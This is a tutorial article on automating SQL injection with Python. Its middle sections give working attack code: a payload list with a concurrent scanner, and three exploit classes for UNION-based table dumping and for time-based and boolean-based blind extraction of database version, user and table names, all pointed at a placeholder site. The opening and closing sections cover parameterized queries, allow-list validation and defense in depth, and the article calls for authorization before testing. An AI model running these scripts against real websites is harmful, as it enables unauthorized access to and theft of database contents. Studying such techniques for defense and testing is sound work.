Automating SQL Injection Exploits
SQL injection is a critical security vulnerability that can lead to unauthorized access, data breaches, and system compromises. In this article, we’ll explore how to automate SQL injection exploits using Python, providing practical examples and use cases.
Understanding SQL Injection
SQL injection occurs when user-supplied data is concatenated into the text of a SQL query instead of being passed as a bound parameter. The database then parses the input as part of the query, which lets an attacker change the query’s logic and execute unintended commands.
graph TB
    A[User Input] --> B[Web Application]
    B --> C[SQL Query Generation]
    C --> D[Database]
    E[Attacker Input] --> B
    E -.-> F[Manipulated Query]
    F -.-> D
    G[Normal Query] -.-> D
    H[Firewall/WAF] -.- B
    I[Input Validation] -.- B
    J[Parameterized Queries] -.- C
Basic SQL Injection Example
Let’s start with a simple example of how SQL injection works:
import sqlite3

def get_user(username):
    conn = sqlite3.connect('users.db')
    cursor = conn.cursor()
    # Vulnerable: user input is interpolated directly into the SQL string
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)
    return cursor.fetchone()

# The injected quote and OR clause change the query's logic
user = get_user("admin' OR '1'='1")
print(user)
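In this example, the input admin' OR '1'='1 turns the WHERE clause into username = 'admin' OR '1'='1', which is true for every row. The query therefore matches all users, and fetchone() returns the first of them whether or not a user named admin exists. In a login check built this way, that is enough to bypass authentication.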
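The effect is easiest to see side by side with a bound parameter. The following is a minimal sketch using an in-memory SQLite database; the table contents and the function names find_vulnerable and find_parameterized are hypothetical and exist only for this illustration.

```python
import sqlite3

# Hypothetical in-memory table, used only for this illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany("INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)])

def find_vulnerable(username):
    # String formatting lets the input rewrite the WHERE clause.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()

def find_parameterized(username):
    # The ? placeholder passes the input as data, never as SQL text.
    return conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchall()

payload = "admin' OR '1'='1"
vulnerable_rows = find_vulnerable(payload)
safe_rows = find_parameterized(payload)

# The formatted query matches every row; the bound query matches none.
print(len(vulnerable_rows), len(safe_rows))
```

Neither row has the username admin, yet the formatted query returns both rows, while the parameterized query looks for a user whose name is literally the payload string and finds nothing.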
Automating SQL Injection Discovery
Now, let’s create a more comprehensive Python script to automate the discovery of SQL injection vulnerabilities:
import requests
from urllib.parse import urljoin
import concurrent.futures
def test_sql_injection(url, param):
payloads = [
"'", "\"", "1' OR '1'='1", "1\" OR \"1\"=\"1",
"' UNION SELECT NULL--", "\" UNION SELECT NULL--",
"' AND 1=0 UNION SELECT 1,2,3--", "1' AND '1'='1",
"1 AND 1=1", "1' AND '1'='1' --"
]
for payload in payloads:
test_url = urljoin(url, f"?{param}={payload}")
response = requests.get(test_url)
if any(error in response.text.lower() for error in ["sql syntax", "mysql error", "ora-", "postgresql error"]):
print(f"Potential SQL injection found: {test_url}")
return True
return False
def scan_website(base_url, params):
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_param = {executor.submit(test_sql_injection, base_url, param): param for param in params}
for future in concurrent.futures.as_completed(future_to_param):
param = future_to_param[future]
try:
if future.result():
print(f"Vulnerable parameter: {param}")
except Exception as exc:
print(f"{param} generated an exception: {exc}")
# Example usage
target_url = "http://vulnerable-website.com/users.php"
params_to_test = ["id", "username", "password", "email"]
scan_website(target_url, params_to_test)
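This script sends a fixed list of SQL injection payloads to each parameter and flags any response that contains a known database error string, testing parameters concurrently with a pool of five worker threads. Because it relies on error messages appearing in the response, it only detects error-based injection; an application that suppresses database errors will not be flagged even if it is vulnerable.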
Exploiting SQL Injection with Python
Once a vulnerability is discovered, we can automate the exploitation process. Here’s an advanced example that demonstrates various SQL injection techniques:
import requests
from bs4 import BeautifulSoup
import re
class SQLInjector:
def __init__(self, url, param):
self.url = url
self.param = param
def exploit(self, payload):
exploit_url = f"{self.url}?{self.param}={payload}"
response = requests.get(exploit_url)
return response.text
def extract_data(self, payload):
result = self.exploit(payload)
soup = BeautifulSoup(result, 'html.parser')
return soup.get_text()
def union_based_injection(self):
columns = self.determine_columns()
if columns:
print(f"Number of columns: {columns}")
version = self.get_database_version(columns)
print(f"Database version: {version}")
tables = self.get_tables(columns)
print(f"Tables: {tables}")
for table in tables:
columns = self.get_columns(table, columns)
print(f"Columns in {table}: {columns}")
self.dump_data(table, columns)
def determine_columns(self):
for i in range(1, 20):
payload = f"' UNION SELECT {','.join(['NULL']*i)}--"
if "mysql error" not in self.exploit(payload).lower():
return i
return None
def get_database_version(self, columns):
payload = f"' UNION SELECT {','.join(['NULL']*(columns-1))},@@version--"
return self.extract_data(payload)
def get_tables(self, columns):
payload = f"' UNION SELECT {','.join(['NULL']*(columns-1))},GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()--"
result = self.extract_data(payload)
return result.split(',')
def get_columns(self, table, columns):
payload = f"' UNION SELECT {','.join(['NULL']*(columns-1))},GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table}'--"
result = self.extract_data(payload)
return result.split(',')
def dump_data(self, table, columns):
column_list = ','.join(columns)
payload = f"' UNION SELECT {','.join(['NULL']*(len(columns)-1))},{column_list} FROM {table}--"
result = self.extract_data(payload)
print(f"Data from {table}:")
print(result)
# Example usage
url = "http://vulnerable-website.com/users.php"
injector = SQLInjector(url, "id")
injector.union_based_injection()
This script demonstrates a more comprehensive approach to SQL injection, including techniques to determine the number of columns, extract database information, and dump table contents.
Time-Based Blind SQL Injection
For situations where we can’t see the output directly, we can use time-based techniques. Here’s an advanced example:
import requests
import time
import string
class TimeBasedSQLInjector:
def __init__(self, url, param):
self.url = url
self.param = param
self.timeout = 5
def inject(self, payload):
start_time = time.time()
requests.get(f"{self.url}?{self.param}={payload}", timeout=self.timeout)
return time.time() - start_time
def extract_data(self, query):
extracted = ""
for position in range(1, 50):
for char in string.printable:
payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{position},1))={ord(char)},SLEEP({self.timeout}),0)--"
try:
delay = self.inject(payload)
if delay >= self.timeout:
extracted += char
print(f"Found character: {char}")
break
except requests.Timeout:
extracted += char
print(f"Found character: {char}")
break
if len(extracted) < position:
break
return extracted
def get_database_version(self):
return self.extract_data("SELECT VERSION()")
def get_current_user(self):
return self.extract_data("SELECT CURRENT_USER()")
def get_database_name(self):
return self.extract_data("SELECT DATABASE()")
def get_tables(self):
return self.extract_data("SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()")
# Example usage
url = "http://vulnerable-website.com/users.php"
injector = TimeBasedSQLInjector(url, "id")
print(f"Database version: {injector.get_database_version()}")
print(f"Current user: {injector.get_current_user()}")
print(f"Current database: {injector.get_database_name()}")
print(f"Tables: {injector.get_tables()}")
This script uses time delays to infer information about the database structure and content, even when there’s no visible output.
Boolean-Based Blind SQL Injection
Another technique for blind SQL injection is using boolean-based queries:
import requests
class BooleanBasedSQLInjector:
def __init__(self, url, param, true_condition, false_condition):
self.url = url
self.param = param
self.true_condition = true_condition
self.false_condition = false_condition
def inject(self, payload):
response = requests.get(f"{self.url}?{self.param}={payload}")
return self.true_condition in response.text
def extract_data(self, query):
extracted = ""
for position in range(1, 50):
left, right = 32, 126
while left <= right:
mid = (left + right) // 2
payload = f"1' AND ASCII(SUBSTRING(({query}),{position},1))>{mid}--"
if self.inject(payload):
left = mid + 1
else:
right = mid - 1
if left == 32:
break
extracted += chr(left)
print(f"Found character: {chr(left)}")
return extracted
def get_database_version(self):
return self.extract_data("SELECT VERSION()")
def get_current_user(self):
return self.extract_data("SELECT CURRENT_USER()")
def get_database_name(self):
return self.extract_data("SELECT DATABASE()")
# Example usage
url = "http://vulnerable-website.com/users.php"
injector = BooleanBasedSQLInjector(url, "id", "Login successful", "Login failed")
print(f"Database version: {injector.get_database_version()}")
print(f"Current user: {injector.get_current_user()}")
print(f"Current database: {injector.get_database_name()}")
This script uses binary search over the printable ASCII range (32 to 126), so each character takes about seven requests rather than up to 95 with a linear scan of the same range.
Preventing SQL Injection
To prevent SQL injection, always use parameterized queries or prepared statements. Here’s an example using SQLAlchemy, a popular Python SQL toolkit:
from sqlalchemy import Column, Integer, String, create_engine, text
from sqlalchemy.orm import declarative_base, sessionmaker

# Create an engine and session
engine = create_engine('sqlite:///users.db')
Session = sessionmaker(bind=engine)
session = Session()

def get_user_secure(username):
    # Parameterized query: :username is bound as data, not spliced into the SQL
    query = text("SELECT * FROM users WHERE username = :username")
    result = session.execute(query, {"username": username})
    return result.fetchone()

# The payload is treated as a literal username, so it can only match
# a user whose name is exactly that string
user = get_user_secure("admin' --")
print(user)

# The ORM also builds parameterized queries for filter expressions
Base = declarative_base()

class User(Base):
    __tablename__ = 'users'
    id = Column(Integer, primary_key=True)
    username = Column(String)
    password = Column(String)

def get_user_orm(username):
    return session.query(User).filter(User.username == username).first()

# The comparison value is bound as a parameter here too
user = get_user_orm("admin' --")
print(user)
This example demonstrates the use of parameterized queries and an Object-Relational Mapping (ORM) to prevent SQL injection vulnerabilities.
Conclusion
Automating SQL injection techniques can be powerful for both attackers and defenders. As security professionals, understanding these methods is crucial for identifying and mitigating vulnerabilities in web applications.
Remember, always obtain proper authorization before testing any system for vulnerabilities, and use this knowledge responsibly to improve security.
Here are some additional best practices for preventing SQL injection:
- Input Validation: Implement strict input validation on the server side. Client-side checks improve usability but are easily bypassed, so they should never be the only line of defense.
- Least Privilege: Use database accounts with minimal necessary privileges.
- Web Application Firewall (WAF): Implement a WAF to filter malicious requests.
- Regular Updates: Keep all software components up-to-date with the latest security patches.
- Security Testing: Regularly perform security assessments and penetration testing.
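Input validation matters most where bound parameters cannot help: placeholders bind values, not identifiers such as column names. A common approach in that case is an allow-list. The sketch below assumes a hypothetical set of sortable columns and a hypothetical helper named build_order_by; neither comes from the scripts above.

```python
# Hypothetical allow-list of columns that callers may sort by.
ALLOWED_SORT_COLUMNS = {"id", "username", "email"}

def build_order_by(column, descending=False):
    """Return an ORDER BY clause, rejecting any column not on the allow-list."""
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    direction = "DESC" if descending else "ASC"
    return f"ORDER BY {column} {direction}"

print(build_order_by("username"))

try:
    build_order_by("id; DROP TABLE users")
except ValueError as exc:
    print(f"rejected: {exc}")
```

Only exact matches against the fixed set reach the query text, so nothing the caller supplies is ever interpreted as SQL.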
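If the measures are assumed to fail independently of one another, the probability that at least one of them stops a given attack is:
$$ P(\text{Prevention}) = 1 - \prod_{i=1}^{n} (1 - P(\text{Measure}_i)) $$
where $P(\text{Measure}_i)$ is the probability that measure $i$ is effective and $n$ is the number of measures implemented. In practice the measures are rarely fully independent, so the formula is an idealized estimate rather than an exact figure.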
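As a worked example, the formula can be evaluated for three measures. The effectiveness values 0.9, 0.7, and 0.5 are hypothetical numbers chosen for illustration, and the calculation assumes the measures fail independently.

```python
from math import prod

def combined_prevention(probabilities):
    """Probability that at least one measure is effective, assuming independence."""
    return 1 - prod(1 - p for p in probabilities)

# Hypothetical effectiveness of three layered measures.
measures = [0.9, 0.7, 0.5]
result = combined_prevention(measures)

# 1 - (0.1 * 0.3 * 0.5) = 1 - 0.015
print(round(result, 3))  # prints 0.985
```

Even a weak third measure raises the combined figure, which is the usual argument for layering defenses instead of relying on a single one.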